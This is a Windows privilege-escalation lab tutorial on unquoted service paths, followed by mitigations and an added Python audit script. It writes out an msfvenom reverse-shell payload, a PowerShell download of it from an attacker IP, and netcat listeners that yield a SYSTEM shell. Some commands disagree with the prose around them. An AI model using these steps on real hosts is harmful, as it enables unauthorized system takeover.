Unquoted Path, or Unquoted Service Path, is reported as a critical vulnerability in Windows. It allows an attacker to escalate privileges from a low-privileged user account to NT AUTHORITY\SYSTEM.
Table of Contents
· Introduction
· Vulnerability Insight
· Prerequisite
· Lab Setup
· Abusing Unquoted Service Paths
· Mitigation
Introduction
Unquoted Service Path
A service has an unquoted service path when the path to its binary is not enclosed in quotes and contains white space. As a result, a local user can elevate to an administrator-level shell by placing an executable in a higher-level directory within that path.
Mitre ID: T1574.009
Tactics: Privilege Escalation & Persistence
Platforms: Windows
Vulnerability Insight
If a service path contains spaces and is not enclosed in quotation marks, the Windows API has to guess where the referenced executable is. Suppose, for example, a service uses the unquoted path:
Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will try this path in the following sequence, from 1 to 4, so a malicious.exe placed in a writeable directory along the way is executed instead of the real binary:
1. C:\Program.exe
2. C:\Program Files\Ignite.exe
3. C:\Program Files\Ignite Data\Vuln.exe
4. C:\Program Files\Ignite Data\Vuln Service\file.exe
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: SubInACL, PowerUp.ps1, WinPEAS
Condition: Compromise the target machine with low-privilege access, for example using Metasploit or Netcat.
Objective: Escalate to NT AUTHORITY\SYSTEM privileges from a low-privileged user by exploiting the unquoted service path vulnerability.
Lab Setup
To set up a vulnerable environment for Unquoted Path, we need user accounts. Here we have user “ignite”, who is a member of the Administrators group, and “Shreya”, who is a member of the Users group.
net user ignite
net user shreya
Steps to Set Up a Vulnerable Environment
Step 1: Create a new folder and a sub-folder named “Ignite Data” and “Vuln Service” respectively.
mkdir "C:\Program Files\Ignite Data\Vuln Service"
Step 2: Create a vulnerable service whose binary path points to file.exe.
sc create "vulns" binpath= "C:\Program Files\Ignite Data\Vuln Service\file.exe" start= auto
Step 3: Grant write permission to BUILTIN\Users on the Ignite Data folder with the help of icacls.
icacls "C:\Program Files\Ignite Data" /grant "BUILTIN\Users":W
*icacls is a native Microsoft Windows command-line program that can display and modify permissions on directories and files.
Step 4: To make the service exploitable, we need to assign some dangerous service permissions with the help of SubInACL, which can change the permissions of services.
NOTE: SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools for working with security permissions in Windows. It can change the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.
In this case, we grant a user permission to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:
Step 5: After downloading SubInACL, execute the following command to assign the PTOC permissions to user “ignite” against the “Pentest” service.
subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO
Abusing Unquoted Service Paths
Abusing unquoted service paths is a technique that exploits insecure file permissions in order to escalate privileges for local users. Download the PowerUp.ps1 script on Kali Linux; it returns the name and binary path of every service with an unquoted path that also contains a space.
wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
python -m SimpleHTTPServer 80
Get initial access to the target machine, transfer PowerUp.ps1 and execute the Get-UnquotedService command. It uses Get-WmiObject to query all win32_service objects and extract the binary pathname of each, then checks whether any binary path contains a space and is not quoted.
nc -lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1 -o PowerUP.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService
As a result, we have enumerated the path for file.exe, as highlighted in the image below.
From the above, we identify three directories, "Program Files", "Ignite Data" and "Vuln Service", and for each directory we use icacls to check its permissions.
icacls "C:\Program Files"
icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln Service"
Here we found that BUILTIN\Users has write permission on “Ignite Data”.
Using the automated script WinPEASx64, we enumerate the suspicious file and folder for the unquoted path.
winPEASx64.exe quiet servicesinfo
The result is the same as above.
It’s time to exploit the weakly configured service with the unquoted path in order to escalate privileges for user Shreya. As we know the unquoted folder name is Vuln Service, we will create a file named Vuln.exe with the help of msfvenom.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > Vuln.exe
python -m SimpleHTTPServer 80
Start a fresh netcat listener in a new terminal and transfer Vuln.exe to the "Ignite Data" folder on the target machine. Since Shreya is a member of BUILTIN\Users, which has write permission on “Ignite Data”, restarting the service will result in a reverse connection.
cd c:\Program Files\Ignite Data
powershell wget http://192.168.1.3/Vuln.exe -o Vuln.exe
net start vulns
As soon as the service launches, the attacker gets a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.
nc -lvp 8888
whoami
Alternatively, if the user is able to restart the system, a reboot will automatically start the service (it was created with start= auto), which launches Vuln.exe and again provides a reverse connection.
shutdown /r /t 0
As soon as the service launches, the attacker gets a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.
nc -lvp 8888
Mitigation
Vulnerability Solution: Ensure that any service whose path contains a space has that path enclosed in quotes.
Restrict File and Directory Permissions: Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
Execution Prevention: Block execution of code on a system through application control and/or script blocking.
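As an added example (not part of the original post, PowerUp or WinPEAS), the following Python reproduces the lookup sequence from the Vulnerability Insight section and turns it into a defensive audit: it flags services whose unquoted binary path contains spaces, lists the directories whose write ACLs must be checked, and emits the quoted path that the mitigation calls for. The service records are constructed; on a Windows host you would feed it each Win32_Service PathName instead.

```python
# Added example (not from the original post): audit service ImagePath strings for the
# unquoted-path weakness and emit the quoted fix. Runs offline on the constructed
# SAMPLE below; on Windows feed it each Win32_Service.PathName instead.
import ntpath

def executable_part(path_name: str) -> str:
    """Executable portion of a service command line, arguments stripped."""
    s = path_name.strip()
    if s.startswith('"'):                 # quoted: exe ends at the closing quote
        return s[1:s.index('"', 1)]
    tokens = s.split(" ")                 # unquoted: exe ends at the first *.exe token
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[:i + 1])
    return s

def search_candidates(path_name: str) -> list[str]:
    """Paths Windows tries in order (the 1-to-4 sequence in the post): every
    space-delimited prefix with .exe appended, ending at the real binary."""
    tokens = executable_part(path_name).split(" ")
    out = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        out.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return out

def hijack_directories(path_name: str) -> list[str]:
    """Directories that must not be writable by standard users (icacls targets)."""
    dirs = [ntpath.dirname(c) for c in search_candidates(path_name)[:-1]]
    return list(dict.fromkeys(dirs))      # de-duplicate, keep search order

def quoted_fix(path_name: str) -> str:
    """Remediated ImagePath: exe quoted, arguments kept (apply with sc config ... binPath=)."""
    s = path_name.strip()
    exe = executable_part(s)
    args = s[len(exe):].strip()
    return f'"{exe}"' + (f" {args}" if args else "")

def audit(services: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Map each vulnerable (unquoted, space-containing) service to the dirs to harden."""
    return {n: hijack_directories(p) for n, p in services
            if not p.lstrip().startswith('"') and " " in executable_part(p)}

# Constructed sample: the post's "vulns" service plus two correctly configured ones.
SAMPLE = [
    ("vulns", r"C:\Program Files\Ignite Data\Vuln Service\file.exe"),
    ("safe1", r'"C:\Program Files\Ignite Data\Vuln Service\file.exe" -svc'),
    ("safe2", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]
```

Running audit(SAMPLE) reports only "vulns", with C:\, C:\Program Files and C:\Program Files\Ignite Data as the directories to check, which matches the icacls walk in the post.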